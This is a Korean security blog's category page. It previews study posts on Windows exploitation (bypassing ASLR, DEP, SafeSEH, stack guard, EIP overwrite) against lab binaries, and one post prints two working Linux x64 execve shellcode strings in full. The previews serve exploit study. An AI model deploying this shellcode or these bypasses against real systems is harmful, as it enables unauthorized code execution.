본문 바로가기

IT

[WRITE UP] HTTP Pirates 2번 보호되어 있는 글입니다. 더보기
[Windows System Hacking] Bypassing ASLR - 부분 Overwrite [*] 해당 문서는 서적 [윈도우 시스템 해킹 가이드 - 버그헌팅과 익스플로잇]을 참고하여 작성하였습니다. Windows System Hacking 연구를 위해서 학습을 진행하며 여러가지 공격기법에 대하여 정리하려고 한다. 해당 문서는 Mitigation중 하나인 ASLR에 대한 우회방법(Bypassing)에 대해 기술한 문서이다. ASLR는 프로세스 실행 시 마다 로드되는 모듈 및 스택등의 메모리 배치를 무작위(Randomization)로 배치하여 공격을 방어하는 기법이다. [실습 바이너리 & 익스플로잇 코드] [ 실습 환경 ] 테스트 환경 : Windows 10 Pro 64bit 테스트 대상 : reader_full_aslr.exe [ASLR, Non DEP, Non StackGuard, Non sa.. 더보기
[Windows System Hacking] Bypassing DEP [*] 해당 문서는 서적 [윈도우 시스템 해킹 가이드 - 버그헌팅과 익스플로잇]을 참고하여 작성하였습니다. Windows System Hacking 연구를 위해서 학습을 진행하며 여러가지 공격기법에 대하여 정리하려고 한다. 해당 문서는 Mitigation중 하나인 DEP에 대한 우회방법(Bypassing)에 대해 기술한 문서이다. DEP는 메모리 영역에 실행권한을 두어 실행권한이 없는 메모리 영역의 코드가 실행되는 것을 방지하는 기법이다. [실습 바이너리 & 익스플로잇 코드] [ 실습 환경 ] 테스트 환경 : Windows 10 Pro 64bit 테스트 대상 : VUPlayer 2.4.9 [Non ASLR, DEP, Non StackGuard, Non safeSEH] 테스트 도구 : Immunity De.. 더보기
[Windows System Hacking] Bypassing Safe SEH [*] 해당 문서는 서적 [윈도우 시스템 해킹 가이드 - 버그헌팅과 익스플로잇]을 참고하여 작성하였습니다. Windows System Hacking 연구를 위해서 학습을 진행하며 여러가지 공격기법에 대하여 정리하려고 한다. 해당 문서는 Mitigation중 하나인 Safe SEH에 대한 우회방법(Bypassing)에 대해 기술한 문서이다. SafeSEH는 SEH Handler를 덮어씌워서 공격하는 SEH Overwrite Exploit 기법을 막기 위한 방어기법이다. [실습 바이너리 & 익스플로잇 코드] [ 실습 환경 ] 테스트 환경 : Windows 10 Pro 64bit 테스트 대상 : Easy Chat Server[Non ASLR, Non DEP, StackGuard, safeSEH] 테스트 도구 .. 더보기
[Windows System Hacking] Bypassing Stack Guard [*] 해당 문서는 서적 [윈도우 시스템 해킹 가이드 - 버그헌팅과 익스플로잇]을 참고하여 작성하였습니다. Windows System Hacking 연구를 위해서 학습을 진행하며 여러가지 공격기법에 대하여 정리하려고 한다. 해당 문서는 Mitigation중 하나인 Stack Guard에 대한 우회방법(Bypassing)에 대해 기술한 문서이다. [실습 바이너리 & 익스플로잇 코드] [ 실습 환경 ] 테스트 환경 : Windows 10 Pro 64bit 테스트 대상 : reader_seh.exe[Non ASLR, Non DEP, StackGuard, Non safeSEH] 테스트 도구 : OllyDBG110, IDA Pro 7.0 우선 테스트 환경은 Windows 10 Pro 64bit 버전 하에서 보호기.. 더보기
[Windows System Hacking] Trampoline Techinque [*] 해당 문서는 서적 [윈도우 시스템 해킹 가이드 - 버그헌팅과 익스플로잇]을 참고하여 작성하였습니다. Windows System Hacking 연구를 위해서 학습을 진행하며 여러가지 공격기법에 대하여 정리하려고 한다. 해당 문서는 Stack 기반의 Buffer Over Flow를 이용한 Return Address 변조에 관한 문서이다. [실습 바이너리 & 익스플로잇 코드] [ 실습 환경 ] 테스트 환경 : Windows 10 Pro 64bit 테스트 대상 : BufferOverFlow.exe[ASLR, Non DEP, Non StackGuard, Non safeSEH] 테스트 도구 : Immunity Debugger, IDA Pro 7.0 우선 테스트 환경은 Windows 10 Pro 64bit 버.. 더보기
[Windows System Hacking] Direct EIP Overwrite [*] 해당 문서는 서적 [윈도우 시스템 해킹 가이드 - 버그헌팅과 익스플로잇]을 참고하여 작성하였습니다. Windows System Hacking 연구를 위해서 학습을 진행하며 여러가지 공격기법에 대하여 정리하려고 한다. 해당 문서는 Stack 기반의 Buffer Over Flow를 이용한 Return Address 변조에 관한 문서이다. [실습 바이너리 & 익스플로잇 코드] [ 실습 환경 ] 테스트 환경 : Windows 10 Pro 64bit 테스트 대상 : BufferOverFlow.exe[Non ASLR, Non DEP, Non StackGuard, Non safeSEH] 테스트 도구 : OllyDBG 110, IDA Pro 7.0 우선 테스트 환경은 Windows 10 Pro 64bit 버전 .. 더보기
Linux/x64 Shellcode (64bit/64비트) Shellcode(23Bytes) "\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05" Shellcode(31Bytes) "\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05" 더보기